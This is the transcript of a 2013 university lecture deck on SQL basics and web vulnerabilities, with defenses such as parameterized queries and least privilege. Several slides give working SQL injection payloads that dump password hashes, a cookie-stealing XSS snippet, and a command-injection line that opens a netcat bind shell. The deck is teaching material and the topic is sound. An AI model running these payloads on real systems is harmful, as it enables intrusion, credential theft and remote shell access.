Presentation is loading. Please wait.

Presentation is loading. Please wait.

Nick Tsamis University of Tulsa CS 7493 April 2013.

Similar presentations


Presentation on theme: "Nick Tsamis University of Tulsa CS 7493 April 2013."— Presentation transcript:

1 Nick Tsamis University of Tulsa CS 7493 April 2013

2  What is SQL?  Why SQL Matters.  *yawn* What’s the big deal?  What could possibly go wrong?  SQL Injection  XSS  Command Execution  *pffft* So we shouldn’t use SQL?  That’s some smart SQL!

3 Structured Query Language  L anguage  Specialized programming language  Utilized in relational databases  Q uery  Raw data is queried to obtain information  “Our business is turning data into information.” – Michael A. Peterson  S tructured  Adheres to a strict, defined format Query Table Column

4 Relational Databases vs Hierarchical Databases Data relations are stored Top down flow only

5 Popularity  One of the first commercial languages for relational models  Today, exists as the de facto standard  (ANSI and ISO)  It’s EVERYWHERE Versatility  It’s flexible:  T-SQL  MySQL  LINQ

6 Vulnerabilities  SQL is powerful…if you grant it  Manages data some of which is sensitive  Provides a great entry point for access  Recovering lost password:  Security is not always implicit  Raw SQL can be very vulnerable to simple injections  if $ = “anything' OR 'x'='x”

7 SQL Injection  Injecting unintended code into a query  Returning user name from ID  Source code  The attack  We add a second condition that will always examine true (1=1)  Purpose is to dump all user information  $id = ‘ or 1=1 #  WHERE user_id = ‘ ’ or 1=1 # ’ ”;

8 SQL Injection  Injecting unintended code into a query  Returning sql information  The attack(s)  We add a union select to dump additional data  $id = ‘ union SELECT 1, user() #  Yields current sql user  $id = ‘ and 1=1 union select database(),version() #  Yields current sql version and database name

9 SQL Injection  Injecting unintended code into a query  Case Study  Returning the good stuff!!  The attack(s)  We add a union select to dump password data  $id = ‘ union select user, password FROM users #  Yields current user and associated password (hash)

10 XSS (Cross Site Scripting)  Execute unintended scripts inline  Throw an alert  Passed as a url argument  What if we put an inline script in that url?  Alert box shown:

11 XSS (Cross Site Scripting)  Well that wasn’t exactly l33t…  Have a cookie  alert(document.cookie)  Alert box shown:  More serious implications:  Run a custom script that can open a remote connection (backdoor)  Read and dump configuration data (SQL or OS)

12 Command Execution  Use the secret entrance  A site that allows for free IP Pinging  Sample source:  Concatenating commands might work…  ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe  Attempts to allow connections on port 8999 with netcat (nc)   Upon execution, browser waits for connection on port 8999

13 Better SQL  Stored Procedures  Preformat and secure a static query  Grant access to a SP, not the tables it accesses Typically increased performance  Parameter check – data typing  No network traffic – run inside the engine  String Filtering/Escaping  String escape characters  ‘  “  \  NUL

14 Mo’ Better SQL  Parameterized SQL  Strongly typed data is bound on execution  Parameters are populated and checked  User input is not directly embedded  Database Management  Permission limitation  Principle of Least Privilege

15

16  /e/eb/Hierarchical_Model.svg/320px- Hierarchical_Model.svg.png /e/eb/Hierarchical_Model.svg/320px- Hierarchical_Model.svg.png  matters8/relat.gif matters8/relat.gif  QL_ANATOMY_wiki.svg QL_ANATOMY_wiki.svg    parameterized-sql-or-give-me-death.html parameterized-sql-or-give-me-death.html


Download ppt "Nick Tsamis University of Tulsa CS 7493 April 2013."

Similar presentations


Ads by Google